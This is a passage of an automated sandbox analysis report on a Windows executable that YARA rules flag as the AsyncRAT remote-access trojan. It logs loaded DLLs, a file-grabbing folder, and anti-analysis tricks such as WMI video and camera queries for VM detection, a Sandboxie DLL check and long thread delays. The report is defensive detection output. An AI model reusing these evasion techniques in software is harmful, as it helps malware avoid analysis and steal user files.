Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

File written: C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: FUEvp5c8lO.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FUEvp5c8lO.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: winload_prod.pdb source: Temp.txt.3.dr
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.3.dr
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.3.dr
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.3.dr

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07376732 push 00000032h; retf	0_2_07376734
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_073736D7 push ebx; iretd	0_2_073736DA
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 0_2_07370D12 push ecx; iretd	0_2_07370D1C
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_0112F130 push 840113C3h; ret	3_2_0112F139
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_053B0538 push eax; ret	3_2_053B0545
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_053BE590 push es; ret	3_2_053BE5A0
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Code function: 3_2_053BEC58 push esp; iretd	3_2_053BEC59

Source: FUEvp5c8lO.exe

Static PE information: section name: .text entropy: 7.653623162437174

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FUEvp5c8lO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4843f68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FUEvp5c8lO.exe.4818348.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 7920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FUEvp5c8lO.exe PID: 8116, type: MEMORYSTR

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: FUEvp5c8lO.exe, 00000000.00000002.1419660864.0000000004644000.00000004.00000800.00020000.00000000.sdmp, FUEvp5c8lO.exe, 00000003.00000002.2622715180.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Memory allocated: 2DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Memory allocated: 2C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Memory allocated: 7A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Memory allocated: 8A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Memory allocated: 8C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Memory allocated: 9C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Memory allocated: A620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Memory allocated: B620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Memory allocated: 10A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Memory allocated: 2E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Memory allocated: 2D90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598779	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598442	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597753	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597187	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\FUEvp5c8lO.exe	Thread delayed: delay time: 596420	Jump to behavior
